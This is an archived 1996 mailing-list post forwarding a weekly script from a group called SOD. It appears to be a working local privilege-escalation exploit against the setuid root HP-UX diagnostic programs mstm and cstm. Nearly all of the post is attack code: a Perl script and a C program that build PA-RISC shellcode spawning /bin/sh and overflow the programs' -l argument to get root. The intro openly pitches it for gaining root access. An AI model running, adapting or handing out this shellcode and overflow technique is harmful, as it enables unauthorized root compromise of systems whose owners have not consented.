This week: turn me on, dead man

Aleph One (aleph1@underground.org)
Sat, 16 Nov 1996 11:38:33 -0800 


energizer bunny. They keep going, and going, and going.



Aleph One / aleph1@underground.org

http://underground.org/

KeyID 1024/948FD6B5

Fingerprint EE C9 E8 AA CB AF 09 61  8C 39 EA 47 A8 6A B8 01



--- cut here ---

   Well, hello. Welcome back. We're glad to see you. Have a drink. Take

   off that overcoat. Put down that submachine gun. Lay on the couch and

   pretend you're a duck. I'll be over here sending scripts to the

   masses. This week's script is the first of the buffer-overruns and it

   buggers up two very similar setuid root programs in /usr/diag/bin,

   mstm and cstm. It's only been playtested on the 9's, so use with care

   on the 10's, and as always, start clicking your way to root access

   with scripts from the folks at SOD.



Caveat Emptor



   mstm and/or cstm loves you perl script and C src for this week



--- stmo.pl ---

#!/usr/bin/perl



# working exlpoit for 9.X setuid root /usr/diag/bin/[cm]stm



use FileHandle;



sub h2cs {

  local($stuff)=@_;

  local($rv);

  while($stuff !~ /^$/) {

    $bob=$stuff;

    $bob =~ s/^(..).*$/$1/;

    $stuff =~ s/^..//;

    $rv.=chr(oct("0x${bob}"));

    }

  return $rv;

  }



$code="AA"; # two byte alignment



$code.=h2cs("34010102"); # ldi 129,r1

$code.=h2cs("08220401"); # sub rp,r1,r1

$code.=h2cs("602002a6"); # stb r0,339(r1)

#$code.=h2cs("602002ac"); # stb r0,342(r1)

$code.=h2cs("b43a0298"); # addi 332,r1,arg0

$code.=h2cs("34160176"); # ldi 187,r22

$code.=h2cs("34010276"); # ldi 315,r1

$code.=h2cs("08360216"); # and r22,r1,r22

$code.=h2cs("20200801"); # ldil l%c0000004,r1

$code.=h2cs("e420e008"); # ble 4(sr7,r1)

$code.=h2cs("08210280"); # NOP == xor r1,r1,r0

#$code.=h2cs("deadcafe"); # illegal instruction

$num=208-length($code);

$code.="C"x$num;



$data="/bin/sh.sh.";

$num=16-length($data);

$data.="D"x$num;



$num=224-length($of);

$of=$code.$data;

$of.=h2cs("7b03301B");

print "Length is: ",length($of),"\n";

exec("/usr/diag/bin/mstm","-l","$of");



--- stmo.c ---

/* SOD /usr/diag/bin/[cm]stm buffer overflow */



main()

{

char buf[500];



strcpy(buf,"\x41\x41\x34\x01\x01\x02\x08\x22\x04\x01\x60\x20\x02\xa6\x60\x20\x02\xac\xb4\x3a\x02\x98\x34\x16\x01\x76\x34\x01\x02\x76\x08\x36\x02\x16\x08\x21\x02\x80\x20\x20\x08\x01\xe4\x20\xe0\x08\x08\x21\x02\x80\x43\x43\x43\x43\x43\x43\x43\x43\x43\x43\x43\x43\x43\x43\x43\x43\x43\x43\x43\x43\x43\x43\x43\x43\x43\x43\x43\x43\x43\x43\x43\x43\x43\x43\x43\x43\x43\x43\x43\x43\x43\x43\x43\x43\x43\x43\x43\x43\x43\x43\x43\x43\x43\x43\x43\x43\x43\x43\x43\x43\x43\x43\x43\x43\x43\x43\x43\x43\x43\x43\x43\x43\x43\x43\x43\x43\x43\x43\x43\x43\x43\x43\x43\x43\x43\x43\x43\x43\x43\x43\x43\x43\x43\x43\x43\x43\x43\x43\x43\x43\x43\x43\x43\x43\x43\x43\x43\x43\x43\x43\x43\x43\x43\x43\x43\x43\x43\x43\x43\x43\x43\x43\x43\x43\x43\x43\x43\x43\x43\x43\x43\x43\x43\x43\x43\x43\x43\x43\x43\x43\x43\x43\x43\x43\x43\x43\x43\x43\x43\x43\x43\x43\x43\x43\x43\x43\x43\x43\x2f\x62\x69\x6e\x2f\x73\x68\x2e\x2d\x69\x2e\x44\x44\x44\x44\x44\x7b\x03\x30\x1b");



execl("/usr/diag/bin/mstm","/usr/diag/bin/mstm","-l",buf,(char *)0);

/* Either-or, same overflow */

execl("/usr/diag/bin/cstm","/usr/diag/bin/cstm","-l",buf,(char *)0);

}